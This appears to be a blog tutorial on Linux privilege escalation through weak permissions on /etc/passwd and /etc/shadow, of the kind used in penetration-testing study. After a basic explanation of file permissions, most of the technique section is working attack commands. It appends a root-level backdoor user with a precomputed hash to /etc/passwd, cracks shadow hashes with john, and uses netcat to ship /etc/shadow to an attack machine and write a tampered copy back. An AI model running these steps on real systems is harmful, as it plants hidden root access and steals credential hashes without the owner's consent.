Privilege Escalation Techniques Series | Linux | weak file permissions

As I mentioned in my previous blog, without wasting anymore time let’s start with our first technique to escalate our privilege on Linux systems.

This is very minor thing, which can be missed by majority people but permissions do matters!!

Basic file permission in Linux

Before knowing what’s weak file permissions, it’s important to know about Linux file permissions. There are three types of permissions on file: read, write, and execute. These permissions are associated with three categories: owner, group, and others. Each category can have three types of permissions:

Permission Types

• Read (r): Allows viewing the contents of a file or listing the contents of a directory.
• Write (w): Allows modifying or deleting the contents of a file or creating/deleting files in a directory.
• Execute (x): Allows running a file as a program or accessing a directory (entering it using cd).

File Permission Structure

Permissions are displayed using the ls -l command. The output looks something like:

-rwxr-xr--

First character: Denotes the file type:

• - : Regular file
• d : Directory
• l : Symbolic link

Next nine characters: These are the permissions for the owner, group, and others, grouped as:

• rwx : Owner’s permissions
• r-x : Group’s permissions
• r — : Others’ permissions

Changing Permissions

You can change the file permissions using the chmod command.

Symbolic method:

• Add permissions: chmod u+x file.txt (adds execute permission for the owner)
• Remove permissions: chmod g-w file.txt (removes write permission for the group)
• Set permissions: chmod o=r file.txt (sets others to read-only)

Linux file permissions explained

you can read above blog if you want to learn in detailed way about permissions.

Permission Path

There are mainly passwd and shadow file in system. whenever you enter your username (e.g. kali) and give password, then it first checks user in /etc/passwd file and then go to /etc/shadow file to check password you provide. In shadow file password stored in hash format.

/etc/passwd

/etc/shadow

In below image, left side is of passwd file and right is of shadow file where password is stored as hash format

su root -> go check in /etc/passwd (if user available and has hash) -> then check in /etc/shadow for hash -> verify hash from shadow file

We now focus on two files, Passwd and Shadow to Leveraging file permissions to escalate privileges

Passwd file — — username stores here

Notable couple of things about this file:

• It has read permission for everyone
• it’s super RARE that hash directly written here and it’s not detect in any automated tool like linpeas

But if it has write permission then,

1. remove x. so it won’t check in shadow file
2. directly write hash there in /etc/passwd
3. create another user in /etc/passwd as backdoor

it’s straightforward if you think about it, you are adding new user or changing old user’s password. Follow below steps to generate password in hash format (but yeah normal string also works in passwd file)

Follow below steps in your kali to generate password hash with openssl. openssl is installed by default on Kali and it is basically used to encrypt things opn web server and yes we can generate password with it.

#generate password hash for the new user
openssl passwd -1 -salt $salt $password

#for example, try to avoid the hashed password contain special character. The $ is unavoidable, that is the format of passwd hash.
openssl passwd -1 -salt aaa admin134

#result hashed password
$1$aaa$2gZh60XPpDSkkMhy5ZfQ71

Now, as we generated pasword we need to put that into victim machine’s passwd file.

#add the new user to /etc/passwd, remember to escape the special character $ by adding backslash \ infront it.
echo "admin2:\$1\$aaa\$2gZh60XPpDSkkMhy5ZfQ71:0:0:test:/root:/bin/bash" >> /etc/passwd

#switch to new created user
su admin2

sweet! now you can switch to admin2 with admin134 password.

Shadow file — — username & password hashes stored here

There are two things here, read permission or write permission

If it has read permission,

• read /etc/shadow and copy hash of user you want
• crack it with john/hashcat

john 'hash_from_shadow' > hash
john hash --wordlist=rockyou.txt

But if it has write permission then,

we can manipulate the file and change hashes for the root.

simple thing is, we can do same thing which we did for /etc/passwd , generate hash and store it in shadow file with nano/vim/vi. But what if our shell doesn’t support any text editor? then we can use nc to transfer shadow file to our Kali and modify it and send it to back to victim.

1. first, we have to start nc in victim machine

nc -nvlp 5555 < /etc/shadow

2. then start nc in attack machine with victim ip and port

3. so, file come in our attack machine. now create new hash with openssl/mkpasswd

mkpasswd not available in other distros (only in kali), that’s why openssl is preferred

make hash in Kali and transferring it back to Victim,

openssl passwd -6 hello
# now change old hash to new one
# start listening on attack machine
nc attack_ip 5555 < shadow
nc -nvlp 5555 > /etc/shadow

we just transferred shadow file first to our kali and after changing hash of user or adding new user, we just transferred it back to victim in shadow file. All we did is from nc method but you can do it from any other methods.

even we change hash type while transferring shadow file then it still works. you can even pass MD5 hash or anything else to shadow file disregarding of what hash was previously stored

I know this is bit of messy, but from next stories I will try to be more structural and to the point in easy way. Feel free to connect correct me if there’s something wrong :)

And let’s connect on https://www.linkedin.com/in/snehbavarva/ make sure to drop a message after connecting!